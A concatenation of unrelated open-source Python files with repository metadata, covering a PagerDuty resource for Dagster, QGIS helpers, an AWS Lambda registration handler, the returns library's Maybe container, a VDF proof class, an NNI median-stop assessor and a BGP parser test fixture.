import json from pathlib import Path from typing import Any, Dict def load_schema(schema_name: str) -> Dict[str, Any]: if not schema_name.endswith(".json"): schema_name = schema_name + ".json" current_dir = Path(__file__).resolve() schema_path = current_dir.parent / schema_name with open(schema_path) as f: return json.load(f)
27.846154
52
0.696133
795a865dd5c3b9052a6499ae8eb1d31ff0a4a3e1
7,295
py
Python
python_modules/libraries/dagster-pagerduty/dagster_pagerduty/resources.py
bambielli-flex/dagster
30b75ba7c62fc536bc827f177c1dc6ba20f5ae20
[ "Apache-2.0" ]
null
null
null
python_modules/libraries/dagster-pagerduty/dagster_pagerduty/resources.py
bambielli-flex/dagster
30b75ba7c62fc536bc827f177c1dc6ba20f5ae20
[ "Apache-2.0" ]
null
null
null
python_modules/libraries/dagster-pagerduty/dagster_pagerduty/resources.py
bambielli-flex/dagster
30b75ba7c62fc536bc827f177c1dc6ba20f5ae20
[ "Apache-2.0" ]
null
null
null
import pypd from dagster import resource, Dict, Field, String class PagerDutyService: '''Integrates with PagerDuty via the pypd library. See: https://v2.developer.pagerduty.com/docs/events-api-v2 https://v2.developer.pagerduty.com/docs/send-an-event-events-api-v2 https://support.pagerduty.com/docs/services-and-integrations#section-events-api-v2 https://github.com/PagerDuty/pagerduty-api-python-client for documentation and more information. ''' def __init__(self, routing_key): self.routing_key = routing_key def EventV2_create( self, summary, source, severity, event_action='trigger', dedup_key=None, timestamp=None, component=None, group=None, event_class=None, custom_details=None, ): '''Events API v2 enables you to add PagerDuty's advanced event and incident management functionality to any system that can make an outbound HTTP connection. Arguments: summary {string} -- A high-level, text summary message of the event. Will be used to construct an alert's description. Example: "PING OK - Packet loss = 0%, RTA = 1.41 ms" "Host 'acme-andromeda-sv1-c40 :: 179.21.24.50' is DOWN" source {string} -- Specific human-readable unique identifier, such as a hostname, for the system having the problem. Examples: "prod05.theseus.acme-widgets.com" "171.26.23.22" "aws:elasticache:us-east-1:852511987:cluster/api-stats-prod-003" "9c09acd49a25" severity {string} -- How impacted the affected system is. Displayed to users in lists and influences the priority of any created incidents. Must be one of {info, warning, error, critical} Keyword Arguments: event_action {str} -- There are three types of events that PagerDuty recognizes, and are used to represent different types of activity in your monitored systems. (default: 'trigger') * trigger: When PagerDuty receives a trigger event, it will either open a new alert, or add a new trigger log entry to an existing alert, depending on the provided dedup_key. 
Your monitoring tools should send PagerDuty a trigger when a new problem has been detected. You may send additional triggers when a previously detected problem has occurred again. * acknowledge: acknowledge events cause the referenced incident to enter the acknowledged state. While an incident is acknowledged, it won't generate any additional notifications, even if it receives new trigger events. Your monitoring tools should send PagerDuty an acknowledge event when they know someone is presently working on the problem. * resolve: resolve events cause the referenced incident to enter the resolved state. Once an incident is resolved, it won't generate any additional notifications. New trigger events with the same dedup_key as a resolved incident won't re-open the incident. Instead, a new incident will be created. Your monitoring tools should send PagerDuty a resolve event when the problem that caused the initial trigger event has been fixed. dedup_key {string} -- Deduplication key for correlating triggers and resolves. The maximum permitted length of this property is 255 characters. timestamp {string} -- Timestamp (ISO 8601). When the upstream system detected / created the event. This is useful if a system batches or holds events before sending them to PagerDuty. Optional - Will be auto-generated by PagerDuty if not provided. Example: 2015-07-17T08:42:58.315+0000 component {string} -- The part or component of the affected system that is broken. Examples: "keepalive" "webping" "mysql" "wqueue" group {string} -- A cluster or grouping of sources. For example, sources “prod-datapipe-02” and “prod-datapipe-03” might both be part of “prod-datapipe” Examples: "prod-datapipe" "www" "web_stack" event_class {string} -- The class/type of the event. Examples: "High CPU" "Latency" "500 Error" custom_details {Dict[str, str]} -- Additional details about the event and affected system. 
Example: {"ping time": "1500ms", "load avg": 0.75 } ''' data = { 'routing_key': self.routing_key, 'event_action': event_action, 'payload': {'summary': summary, 'source': source, 'severity': severity}, } if dedup_key is not None: data['dedup_key'] = dedup_key if timestamp is not None: data['payload']['timestamp'] = timestamp if component is not None: data['payload']['component'] = component if group is not None: data['payload']['group'] = group if event_class is not None: data['payload']['class'] = event_class if custom_details is not None: data['payload']['custom_details'] = custom_details return pypd.EventV2.create(data=data) @resource( config_field=Field( Dict( { 'routing_key': Field( String, description='''The routing key provisions access to your PagerDuty service. You will need to include the integration key for your new integration, as a routing_key in the event payload.''', ) } ) ), description='''This resource is for posting events to PagerDuty.''', ) def pagerduty_resource(context): return PagerDutyService(context.resource_config.get('routing_key'))
43.422619
100
0.522276
795a86deadc9e13fcfacfb72646c451738774ac0
307
py
Python
zang/domain/enums/call_direction.py
vlastikczech/zang-python
980f5243071404d6838554500a6955ff7bc2a0c7
[ "MIT" ]
null
null
null
zang/domain/enums/call_direction.py
vlastikczech/zang-python
980f5243071404d6838554500a6955ff7bc2a0c7
[ "MIT" ]
null
null
null
zang/domain/enums/call_direction.py
vlastikczech/zang-python
980f5243071404d6838554500a6955ff7bc2a0c7
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ zang.domain.enums.call_direction ~~~~~~~~~~~~~~~~~~~ Module containing `CallDirection` available options """ from enum import Enum class CallDirection(Enum): INBOUND = 'inbound' OUTBOUND_API = 'outbound-api' OUTBOUND_DIAL = 'outbound-dial' UNKNOWN = 'unknown'
19.1875
51
0.651466
795a86fd90ed5cea3a38dc189b675e0f250d88ec
2,171
py
Python
utils.py
IHoldYA/urban_datasets
46501cbbe3b21b0110f479fc71b123a664ed720f
[ "MIT" ]
5
2021-04-17T13:03:16.000Z
2021-04-20T14:55:52.000Z
utils.py
IHoldYA/urban_datasets
46501cbbe3b21b0110f479fc71b123a664ed720f
[ "MIT" ]
null
null
null
utils.py
IHoldYA/urban_datasets
46501cbbe3b21b0110f479fc71b123a664ed720f
[ "MIT" ]
4
2021-04-19T01:21:10.000Z
2021-08-31T12:08:08.000Z
import qgis from qgis.core import * # from PyQt4.QtGui import * # from PyQt4.QtCore import * def add_feature(_v, _pr, feature): convexhull = feature.geometry().convexHull() f = QgsFeature() f.setGeometry(convexhull) f.setAttributes(['1']) _pr.addFeature(f) _v.updateExtents() _v.commitChanges() QgsProject.instance().addMapLayer(_v) return _v, _pr def add_polygon_to_layer(_attr, _coords, _layer, _pr): f = QgsFeature() _coords = [QgsPointXY(x[0], x[1]) for x in _coords] polygon = QgsGeometry.fromPolygonXY([_coords]) f.setGeometry(polygon) f.setAttributes(_attr) _pr.addFeature(f) _layer.updateExtents() def find_feature(center_point, _layer, categories=[]): for feature in _layer.getFeatures(): # takes 0.09 sec, 0.22 worst case if feature.geometry().contains( QgsPointXY(center_point[0], center_point[1])): if feature.attributes()[3] in categories: return feature def find_features_poly(feat, _layer): _total = 0 for _feature in _layer.getFeatures(): if feat.geometry().contains(_feature.geometry()): _total += _feature.geometry().area() return _total def get_feature_color(_layer, _feature): for cat in _layer[0].renderer().categories(): if cat.value() == _feature.attributes()[3]: print(cat.symbol().color()) return cat.symbol() def one_feature_layer(feature): _v, _pr = make_new_layer() _f = feature # f.setGeometry(feature.geometry()) _v, _pr = add_feature(_v, _pr, _f) return _v def pan(canvas, x, y): currExt = canvas.extent() canvasCenter = currExt.center() dx = x dy = y xMin = currExt.xMinimum() + dx xMax = currExt.xMaximum() + dx yMin = currExt.yMinimum() + dy yMax = currExt.yMaximum() + dy newRect = QgsRectangle(xMin, yMin, xMax, yMax) canvas.setExtent(newRect) canvas.refresh() def square_to_coord(square): """ Function that transforms a bounding box in a list of coordinates. 
:param square: bounding box as consequent points, list :return: list of coordinates, list """ _coords = [(square[0], square[1]), (square[0], square[3]), (square[2], square[3]), (square[2], square[1]), (square[0], square[1])] return _coords
25.244186
66
0.69415
795a87911bb3da41b1b3593814cd06e20d90ac34
4,475
py
Python
code/lambda/function/Auth/Register/app.py
Xchange-Taiwan/XChange-SSO-Architect
0bb56bcf8a849cf3b5858f0597696b5bae00de58
[ "Apache-2.0" ]
1
2021-08-31T04:23:12.000Z
2021-08-31T04:23:12.000Z
code/lambda/function/Auth/Register/app.py
Xchange-Taiwan/XChange-SSO-Architect
0bb56bcf8a849cf3b5858f0597696b5bae00de58
[ "Apache-2.0" ]
null
null
null
code/lambda/function/Auth/Register/app.py
Xchange-Taiwan/XChange-SSO-Architect
0bb56bcf8a849cf3b5858f0597696b5bae00de58
[ "Apache-2.0" ]
null
null
null
import json import os import logging from aws import helper from aws import federate from aws.helper import DeveloperMode logger = logging.getLogger() logger.setLevel(logging.INFO) USER_POOL_ID = os.environ["USER_POOL_ID"] USER_TABLE_NAME = os.environ["USER_TABLE_NAME"] @DeveloperMode(True) def lambda_handler(event, context): """ Lambda function to register a new user. description: This function is used to register a new user. The user is registered in the user pool and the user is added to the user table. if platform and platform token are provided, the user is federated to the platform. payload: email: email of the user password: password of the user client_id: client id of the client redirect_uri: client id of the redirect_uri optional: platform: platform to federate the user to dynamodb platform_id_token: token to federate the user to dynamodb platform_access_token: access token to federate the user to dynamodb """ input_json = dict() input_json = json.loads(event["body"]) # Input data validation ----- if not "email" in input_json: return helper.build_response( {"message": "E-mail address is required."}, 403) if not "password" in input_json: return helper.build_response({"message": "Password is required."}, 403) elif len(input_json["password"]) < 6: return helper.build_response( {"message": "Password must be at least 6 characters long."}, 403) if not "client_id" in input_json: return helper.build_response({"message": "`client_id` is required"}, 403) # data validated, assign to variables email = input_json["email"].lower() # store all emails as lower case password = input_json["password"] # verify the client_id and redirect_uri if not "client_id" in input_json or not "redirect_uri" in input_json: return helper.build_response( {"message": "You do not have permission to access this resource."}, 403) client_id = input_json["client_id"] redirect_uri = input_json["redirect_uri"] _, msg = helper.verify_client_id_and_redirect_uri( user_pool_id=USER_POOL_ID, 
client_id=client_id, redirect_uri=redirect_uri) if msg != None: logging.info(msg) return helper.build_response({"message": msg}, 403) # build client metadata for confirmation email ----- client_metadata = dict() if "agent" in input_json: client_metadata["agent"] = input_json["agent"] if "client_id" in input_json: client_metadata["client_id"] = input_json["client_id"] if "redirect_uri" in input_json: client_metadata["redirect_uri"] = input_json["redirect_uri"] # perform cognito register resp, msg = helper.register(user_pool_id=USER_POOL_ID, username=email, email=email, password=password, client_id=client_id, client_metadata=client_metadata) if msg != None: logging.info(msg) return helper.build_response({"message": msg}, 403) # get user info user_cognito_id = resp["UserSub"] # register the federate record in the user table if "platform_id_token" in input_json or "platform_access_token" in input_json: platform_login_data = dict() platform_login_data["platform"] = input_json["platform"] if "platform_code" in input_json: platform_login_data["code"] = input_json["platform_code"] if "platform_id_token" in input_json: platform_login_data["id_token"] = input_json["platform_id_token"] if "platform_access_token" in input_json: platform_login_data["access_token"] = input_json[ "platform_access_token"] feder_resp, msg = federate.verify_federate_and_register_or_get_user( user_table_name=USER_TABLE_NAME, platform_login_data=platform_login_data, user_cognito_id=user_cognito_id, cognito_email=email, mode="register") if msg != None: logging.info(msg) return helper.build_response({"message": msg}, 403) return helper.build_response({"message": msg}, 200)
36.382114
91
0.643799
795a87fe948b71dcac2e9aa8e2b1072905629fb0
12,892
py
Python
returns/maybe.py
MichaelAOlson/returns
56e0df46846890b1c33dd26216086f94269292ad
[ "BSD-2-Clause" ]
null
null
null
returns/maybe.py
MichaelAOlson/returns
56e0df46846890b1c33dd26216086f94269292ad
[ "BSD-2-Clause" ]
null
null
null
returns/maybe.py
MichaelAOlson/returns
56e0df46846890b1c33dd26216086f94269292ad
[ "BSD-2-Clause" ]
null
null
null
from abc import ABCMeta from functools import wraps from typing import ( Any, Callable, ClassVar, NoReturn, Optional, Type, TypeVar, Union, ) from typing_extensions import final from returns.interfaces.specific.maybe import MaybeBased2 from returns.primitives.container import BaseContainer, container_equality from returns.primitives.exceptions import UnwrapFailedError from returns.primitives.hkt import Kind1, SupportsKind1 # Definitions: _ValueType = TypeVar('_ValueType', covariant=True) _NewValueType = TypeVar('_NewValueType') # Aliases: _FirstType = TypeVar('_FirstType') _SecondType = TypeVar('_SecondType') class Maybe( BaseContainer, SupportsKind1['Maybe', _ValueType], MaybeBased2[_ValueType, None], metaclass=ABCMeta, ): """ Represents a result of a series of computations that can return ``None``. An alternative to using exceptions or constant ``is None`` checks. ``Maybe`` is an abstract type and should not be instantiated directly. Instead use ``Some`` and ``Nothing``. See also: - https://github.com/gcanti/fp-ts/blob/master/docs/modules/Option.ts.md """ _inner_value: Optional[_ValueType] #: Alias for `Nothing` empty: ClassVar['Maybe[Any]'] # These two are required for projects like `classes`: #: Success type that is used to represent the successful computation. success_type: ClassVar[Type['_Some']] #: Failure type that is used to represent the failed computation. failure_type: ClassVar[Type['_Nothing']] #: Typesafe equality comparison with other `Result` objects. equals = container_equality def map( # noqa: WPS125 self, function: Callable[[_ValueType], _NewValueType], ) -> 'Maybe[_NewValueType]': """ Composes successful container with a pure function. .. code:: python >>> from returns.maybe import Some, Nothing >>> def mappable(string: str) -> str: ... 
return string + 'b' >>> assert Some('a').map(mappable) == Some('ab') >>> assert Nothing.map(mappable) == Nothing """ def apply( self, function: Kind1['Maybe', Callable[[_ValueType], _NewValueType]], ) -> 'Maybe[_NewValueType]': """ Calls a wrapped function in a container on this container. .. code:: python >>> from returns.maybe import Some, Nothing >>> def appliable(string: str) -> str: ... return string + 'b' >>> assert Some('a').apply(Some(appliable)) == Some('ab') >>> assert Some('a').apply(Nothing) == Nothing >>> assert Nothing.apply(Some(appliable)) == Nothing >>> assert Nothing.apply(Nothing) == Nothing """ def bind( self, function: Callable[[_ValueType], Kind1['Maybe', _NewValueType]], ) -> 'Maybe[_NewValueType]': """ Composes successful container with a function that returns a container. .. code:: python >>> from returns.maybe import Nothing, Maybe, Some >>> def bindable(string: str) -> Maybe[str]: ... return Some(string + 'b') >>> assert Some('a').bind(bindable) == Some('ab') >>> assert Nothing.bind(bindable) == Nothing """ def bind_optional( self, function: Callable[[_ValueType], Optional[_NewValueType]], ) -> 'Maybe[_NewValueType]': """ Binds a function returning an optional value over a container. .. code:: python >>> from returns.maybe import Some, Nothing >>> from typing import Optional >>> def bindable(arg: str) -> Optional[int]: ... return len(arg) if arg else None >>> assert Some('a').bind_optional(bindable) == Some(1) >>> assert Some('').bind_optional(bindable) == Nothing """ def lash( self, function: Callable[[Any], Kind1['Maybe', _ValueType]], ) -> 'Maybe[_ValueType]': """ Composes failed container with a function that returns a container. .. code:: python >>> from returns.maybe import Maybe, Some, Nothing >>> def lashable(arg=None) -> Maybe[str]: ... 
return Some('b') >>> assert Some('a').lash(lashable) == Some('a') >>> assert Nothing.lash(lashable) == Some('b') We need this feature to make ``Maybe`` compatible with different ``Result`` like oeprations. """ def value_or( self, default_value: _NewValueType, ) -> Union[_ValueType, _NewValueType]: """ Get value from successful container or default value from failed one. .. code:: python >>> from returns.maybe import Nothing, Some >>> assert Some(0).value_or(1) == 0 >>> assert Nothing.value_or(1) == 1 """ def or_else_call( self, function: Callable[[], _NewValueType], ) -> Union[_ValueType, _NewValueType]: """ Get value from successful container or default value from failed one. Really close to :meth:`~Maybe.value_or` but works with lazy values. This method is unique to ``Maybe`` container, because other containers do have ``.alt`` method. But, ``Maybe`` does not have this method. There's nothing to ``alt`` in ``Nothing``. Instead, it has this method to execute some function if called on a failed container: .. code:: pycon >>> from returns.maybe import Some, Nothing >>> assert Some(1).or_else_call(lambda: 2) == 1 >>> assert Nothing.or_else_call(lambda: 2) == 2 It might be useful to work with exceptions as well: .. code:: pycon >>> def fallback() -> NoReturn: ... raise ValueError('Nothing!') >>> Nothing.or_else_call(fallback) Traceback (most recent call last): ... ValueError: Nothing! """ def unwrap(self) -> _ValueType: """ Get value from successful container or raise exception for failed one. .. code:: pycon :force: >>> from returns.maybe import Nothing, Some >>> assert Some(1).unwrap() == 1 >>> Nothing.unwrap() Traceback (most recent call last): ... returns.primitives.exceptions.UnwrapFailedError """ # noqa: RST399 def failure(self) -> None: """ Get failed value from failed container or raise exception from success. .. 
code:: pycon :force: >>> from returns.maybe import Nothing, Some >>> assert Nothing.failure() is None >>> Some(1).failure() Traceback (most recent call last): ... returns.primitives.exceptions.UnwrapFailedError """ # noqa: RST399 @classmethod def from_value( cls, inner_value: _NewValueType, ) -> 'Maybe[_NewValueType]': """ Creates new instance of ``Maybe`` container based on a value. .. code:: python >>> from returns.maybe import Maybe, Some >>> assert Maybe.from_value(1) == Some(1) >>> assert Maybe.from_value(None) == Some(None) """ return _Some(inner_value) @classmethod def from_optional( cls, inner_value: Optional[_NewValueType], ) -> 'Maybe[_NewValueType]': """ Creates new instance of ``Maybe`` container based on an optional value. .. code:: python >>> from returns.maybe import Maybe, Some, Nothing >>> assert Maybe.from_optional(1) == Some(1) >>> assert Maybe.from_optional(None) == Nothing """ if inner_value is None: return _Nothing(inner_value) return _Some(inner_value) @final class _Nothing(Maybe[Any]): """Represents an empty state.""" _inner_value: None def __init__(self, inner_value: None = None) -> None: # noqa: WPS632 """ Private constructor for ``_Nothing`` type. Use :attr:`~Nothing` instead. Wraps the given value in the ``_Nothing`` container. ``inner_value`` can only be ``None``. """ super().__init__(None) def __repr__(self): """ Custom ``str`` definition without the state inside. .. 
code:: python >>> from returns.maybe import Nothing >>> assert str(Nothing) == '<Nothing>' >>> assert repr(Nothing) == '<Nothing>' """ return '<Nothing>' def map(self, function): # noqa: WPS125 """Does nothing for ``Nothing``.""" return self def apply(self, container): """Does nothing for ``Nothing``.""" return self def bind(self, function): """Does nothing for ``Nothing``.""" return self def bind_optional(self, function): """Does nothing.""" return self def lash(self, function): """Composes this container with a function returning container.""" return function(None) def value_or(self, default_value): """Returns default value.""" return default_value def or_else_call(self, function): """Returns the result of a passed function.""" return function() def unwrap(self): """Raises an exception, since it does not have a value inside.""" raise UnwrapFailedError(self) def failure(self) -> None: """Returns failed value.""" return self._inner_value @final class _Some(Maybe[_ValueType]): """ Represents a calculation which has succeeded and contains the value. Quite similar to ``Success`` type. """ _inner_value: _ValueType def __init__(self, inner_value: _ValueType) -> None: """ Private type constructor. Please, use :func:`~Some` instead. Required for typing. 
""" super().__init__(inner_value) def map(self, function): # noqa: WPS125 """Composes current container with a pure function.""" return _Some(function(self._inner_value)) def apply(self, container): """Calls a wrapped function in a container on this container.""" if isinstance(container, self.success_type): return self.map(container.unwrap()) # type: ignore return container def bind(self, function): """Binds current container to a function that returns container.""" return function(self._inner_value) def bind_optional(self, function): """Binds a function returning an optional value over a container.""" return Maybe.from_optional(function(self._inner_value)) def lash(self, function): """Does nothing for ``Some``.""" return self def value_or(self, default_value): """Returns inner value for successful container.""" return self._inner_value def or_else_call(self, function): """Returns inner value for successful container.""" return self._inner_value def unwrap(self): """Returns inner value for successful container.""" return self._inner_value def failure(self): """Raises exception for successful container.""" raise UnwrapFailedError(self) Maybe.success_type = _Some Maybe.failure_type = _Nothing def Some(inner_value: _NewValueType) -> Maybe[_NewValueType]: # noqa: N802 """ Public unit function of protected :class:`~_Some` type. Can return ``Some(None)`` for passed ``None`` argument. Because ``Some(None)`` does make sense. .. code:: python >>> from returns.maybe import Some >>> assert str(Some(1)) == '<Some: 1>' >>> assert str(Some(None)) == '<Some: None>' """ return _Some(inner_value) #: Public unit value of protected :class:`~_Nothing` type. Nothing: Maybe[NoReturn] = _Nothing() Maybe.empty = Nothing def maybe( function: Callable[..., Optional[_ValueType]], ) -> Callable[..., Maybe[_ValueType]]: """ Decorator to convert ``None``-returning function to ``Maybe`` container. This decorator works with sync functions only. Example: .. 
code:: python >>> from typing import Optional >>> from returns.maybe import Nothing, Some, maybe >>> @maybe ... def might_be_none(arg: int) -> Optional[int]: ... if arg == 0: ... return None ... return 1 / arg >>> assert might_be_none(0) == Nothing >>> assert might_be_none(1) == Some(1.0) Requires our :ref:`mypy plugin <mypy-plugins>`. """ @wraps(function) def decorator(*args, **kwargs): return Maybe.from_optional(function(*args, **kwargs)) return decorator
27.844492
79
0.5944
795a884f783bd2c8e015c0684f7a1eb5e5b514b6
2,710
py
Python
cunt/types/blockchain_format/vdf.py
CallMeBrado/cunt-blockchain
9b140b7e5541f3baffabe02a55b75d9aeb889999
[ "Apache-2.0" ]
7
2021-08-09T19:01:51.000Z
2021-12-09T04:32:09.000Z
cunt/types/blockchain_format/vdf.py
CallMeBrado/cunt-blockchain
9b140b7e5541f3baffabe02a55b75d9aeb889999
[ "Apache-2.0" ]
22
2021-08-17T04:12:11.000Z
2022-03-29T04:10:38.000Z
cunt/types/blockchain_format/vdf.py
CallMeBrado/cunt-blockchain
9b140b7e5541f3baffabe02a55b75d9aeb889999
[ "Apache-2.0" ]
4
2021-09-05T12:04:51.000Z
2022-03-15T08:44:32.000Z
import logging import traceback from dataclasses import dataclass from enum import IntEnum from typing import Optional from functools import lru_cache from chiavdf import create_discriminant, verify_n_wesolowski from cunt.consensus.constants import ConsensusConstants from cunt.types.blockchain_format.classgroup import ClassgroupElement from cunt.types.blockchain_format.sized_bytes import bytes32, bytes100 from cunt.util.ints import uint8, uint64 from cunt.util.streamable import Streamable, streamable log = logging.getLogger(__name__) @lru_cache(maxsize=200) def get_discriminant(challenge, size_bites) -> int: return int( create_discriminant(challenge, size_bites), 16, ) @lru_cache(maxsize=1000) def verify_vdf( disc: int, input_el: bytes100, output: bytes, number_of_iterations: uint64, discriminant_size: int, witness_type: uint8, ): return verify_n_wesolowski( str(disc), input_el, output, number_of_iterations, discriminant_size, witness_type, ) @dataclass(frozen=True) @streamable class VDFInfo(Streamable): challenge: bytes32 # Used to generate the discriminant (VDF group) number_of_iterations: uint64 output: ClassgroupElement @dataclass(frozen=True) @streamable class VDFProof(Streamable): witness_type: uint8 witness: bytes normalized_to_identity: bool def is_valid( self, constants: ConsensusConstants, input_el: ClassgroupElement, info: VDFInfo, target_vdf_info: Optional[VDFInfo] = None, ) -> bool: """ If target_vdf_info is passed in, it is compared with info. """ if target_vdf_info is not None and info != target_vdf_info: tb = traceback.format_stack() log.error(f"{tb} INVALID VDF INFO. 
Have: {info} Expected: {target_vdf_info}") return False if self.witness_type + 1 > constants.MAX_VDF_WITNESS_SIZE: return False try: disc: int = get_discriminant(info.challenge, constants.DISCRIMINANT_SIZE_BITS) # TODO: parallelize somehow, this might included multiple mini proofs (n weso) return verify_vdf( disc, input_el.data, info.output.data + bytes(self.witness), info.number_of_iterations, constants.DISCRIMINANT_SIZE_BITS, self.witness_type, ) except Exception: return False # Stores, for a given VDF, the field that uses it. class CompressibleVDFField(IntEnum): CC_EOS_VDF = 1 ICC_EOS_VDF = 2 CC_SP_VDF = 3 CC_IP_VDF = 4
27.373737
90
0.673432
795a88a097dbd365fe7a55af55dc9b0fe6f11e08
4,359
py
Python
nni/algorithms/hpo/medianstop_assessor.py
nbl97/nni
1530339d3e964a5ea95a0afde1775ec9167cdcc0
[ "MIT" ]
2,305
2018-09-07T12:42:26.000Z
2019-05-06T20:14:24.000Z
nni/algorithms/hpo/medianstop_assessor.py
nbl97/nni
1530339d3e964a5ea95a0afde1775ec9167cdcc0
[ "MIT" ]
379
2018-09-10T10:19:50.000Z
2019-05-06T18:04:46.000Z
nni/algorithms/hpo/medianstop_assessor.py
nbl97/nni
1530339d3e964a5ea95a0afde1775ec9167cdcc0
[ "MIT" ]
314
2018-09-08T05:36:08.000Z
2019-05-06T08:48:51.000Z
# Copyright (c) Microsoft Corporation. # Licensed under the MIT license. from __future__ import annotations import logging from schema import Schema, Optional from typing_extensions import Literal from nni import ClassArgsValidator from nni.assessor import Assessor, AssessResult from nni.utils import extract_scalar_history logger = logging.getLogger('medianstop_Assessor') class MedianstopClassArgsValidator(ClassArgsValidator): def validate_class_args(self, **kwargs): Schema({ Optional('optimize_mode'): self.choices('optimize_mode', 'maximize', 'minimize'), Optional('start_step'): self.range('start_step', int, 0, 9999), }).validate(kwargs) class MedianstopAssessor(Assessor): """ The median stopping rule stops a pending trial X at step S if the trial’s best objective value by step S is strictly worse than the median value of the running averages of all completed trials’ objectives reported up to step S Paper: `Google Vizer: A Service for Black-Box Optimization <https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/46180.pdf>`__ Examples -------- .. code-block:: config.assessor.name = 'Medianstop' config.tuner.class_args = { 'optimize_mode': 'maximize', 'start_step': 5 } Parameters ---------- optimize_mode Whether optimize to minimize or maximize trial result. start_step A trial is determined to be stopped or not only after receiving start_step number of reported intermediate results. 
""" def __init__(self, optimize_mode: Literal['minimize', 'maximize'] = 'maximize', start_step: int = 0): self._start_step = start_step self._running_history = dict() self._completed_avg_history = dict() if optimize_mode == 'maximize': self._high_better = True elif optimize_mode == 'minimize': self._high_better = False else: self._high_better = True logger.warning('unrecognized optimize_mode %s', optimize_mode) def _update_data(self, trial_job_id, trial_history): """update data Parameters ---------- trial_job_id : int trial job id trial_history : list The history performance matrix of each trial """ if trial_job_id not in self._running_history: self._running_history[trial_job_id] = [] self._running_history[trial_job_id].extend(trial_history[len(self._running_history[trial_job_id]):]) def trial_end(self, trial_job_id, success): if trial_job_id in self._running_history: if success: cnt = 0 history_sum = 0 self._completed_avg_history[trial_job_id] = [] for each in self._running_history[trial_job_id]: cnt += 1 history_sum += each self._completed_avg_history[trial_job_id].append(history_sum / cnt) self._running_history.pop(trial_job_id) else: logger.warning('trial_end: trial_job_id does not exist in running_history') def assess_trial(self, trial_job_id, trial_history): curr_step = len(trial_history) if curr_step < self._start_step: return AssessResult.Good scalar_trial_history = extract_scalar_history(trial_history) self._update_data(trial_job_id, scalar_trial_history) if self._high_better: best_history = max(scalar_trial_history) else: best_history = min(scalar_trial_history) avg_array = [] for id_ in self._completed_avg_history: if len(self._completed_avg_history[id_]) >= curr_step: avg_array.append(self._completed_avg_history[id_][curr_step - 1]) if avg_array: avg_array.sort() if self._high_better: median = avg_array[(len(avg_array)-1) // 2] return AssessResult.Bad if best_history < median else AssessResult.Good else: median = avg_array[len(avg_array) // 2] return 
AssessResult.Bad if best_history > median else AssessResult.Good else: return AssessResult.Good
36.630252
108
0.645102
795a88b56d209b20aa30b5b34d5c8fc153397e0b
580
py
Python
graphql_jwt/refresh_token/managers.py
ibqn/django-graphql-jwt
dd92319071092bb517187904f3ac0610e8443edf
[ "MIT" ]
24
2020-09-05T17:34:16.000Z
2022-03-17T11:45:55.000Z
graphql_jwt/refresh_token/managers.py
ibqn/django-graphql-jwt
dd92319071092bb517187904f3ac0610e8443edf
[ "MIT" ]
16
2020-09-05T16:55:49.000Z
2022-03-20T16:44:25.000Z
graphql_jwt/refresh_token/managers.py
ibqn/django-graphql-jwt
dd92319071092bb517187904f3ac0610e8443edf
[ "MIT" ]
12
2020-09-15T21:53:48.000Z
2022-03-20T15:07:43.000Z
from django.db import models from django.db.models import Case from django.db.models import Value as V from django.db.models import When from django.utils import timezone from ..settings import jwt_settings class RefreshTokenQuerySet(models.QuerySet): def expired(self): expires = timezone.now() - jwt_settings.JWT_REFRESH_EXPIRATION_DELTA return self.annotate( expired=Case( When(created__lt=expires, then=V(True)), output_field=models.BooleanField(), default=V(False), ), )
27.619048
76
0.663793
795a8a1f7fa2de24a9dc525ced9ad2cbe7a4795b
1,964
py
Python
src/genie/libs/parser/nxos/tests/ShowBgpSessions/cli/equal/golden_output_1_expected.py
balmasea/genieparser
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
[ "Apache-2.0" ]
204
2018-06-27T00:55:27.000Z
2022-03-06T21:12:18.000Z
src/genie/libs/parser/nxos/tests/ShowBgpSessions/cli/equal/golden_output_1_expected.py
balmasea/genieparser
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
[ "Apache-2.0" ]
468
2018-06-19T00:33:18.000Z
2022-03-31T23:23:35.000Z
src/genie/libs/parser/nxos/tests/ShowBgpSessions/cli/equal/golden_output_1_expected.py
balmasea/genieparser
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
[ "Apache-2.0" ]
309
2019-01-16T20:21:07.000Z
2022-03-30T12:56:41.000Z
expected_output = { "total_peers": 3, "total_established_peers": 2, "local_as": 333, "vrf": { "default": { "router_id": "10.106.0.6", "neighbor": { "10.106.102.4": { "last_flap": "01:03:35", "last_write": "00:00:09", "last_read": "00:00:41", "remote_port": 36462, "notifications_sent": 0, "local_port": 179, "notifications_received": 0, "connections_dropped": 0, "state": "established", "remote_as": 333 }, "10.106.101.1": { "last_flap": "01:03:35", "last_write": "00:00:09", "last_read": "00:00:41", "remote_port": 48392, "notifications_sent": 0, "local_port": 179, "notifications_received": 0, "connections_dropped": 0, "state": "established", "remote_as": 333 }, "10.106.102.3": { "last_flap": "01:03:39", "last_write": "never", "last_read": "never", "remote_port": 0, "notifications_sent": 0, "local_port": 0, "notifications_received": 0, "connections_dropped": 0, "state": "idle", "remote_as": 888 } }, "vrf_peers": 3, "vrf_established_peers": 2, "local_as": 333 }, "vpn1": { "router_id": "10.229.11.11", "vrf_peers": 0, "vrf_established_peers": 0, "local_as": 333 } } }
32.733333
49
0.362016
795a8a34ae82d60290c7038cc4879c1b1b1dce14
410
py
Python
devops/girder/plugins/AnnotationPlugin/upenncontrast_annotation/test/conftest.py
zjniu/UPennContrast
7924e68ab01088dd515ef99c0aff4134384b0701
[ "Apache-2.0" ]
null
null
null
devops/girder/plugins/AnnotationPlugin/upenncontrast_annotation/test/conftest.py
zjniu/UPennContrast
7924e68ab01088dd515ef99c0aff4134384b0701
[ "Apache-2.0" ]
null
null
null
devops/girder/plugins/AnnotationPlugin/upenncontrast_annotation/test/conftest.py
zjniu/UPennContrast
7924e68ab01088dd515ef99c0aff4134384b0701
[ "Apache-2.0" ]
null
null
null
import pytest from girder import events def unbindGirderEventsByHandlerName(handlerName): for eventName in events._mapping: events.unbind(eventName, handlerName) @pytest.fixture def unbindLargeImage(db): yield True unbindGirderEventsByHandlerName('large_image') @pytest.fixture def unbindAnnotation(db): yield True unbindGirderEventsByHandlerName('upenncontrast_annotation')
19.52381
63
0.785366
795a8a7708cbea16df97b1d939046b88dab2cab2
121,448
py
Python
sklearn/utils/estimator_checks.py
boricles/scikit-learn
373946ec9e3c72116bfbf7fab051cf4797d13e0f
[ "BSD-3-Clause" ]
1
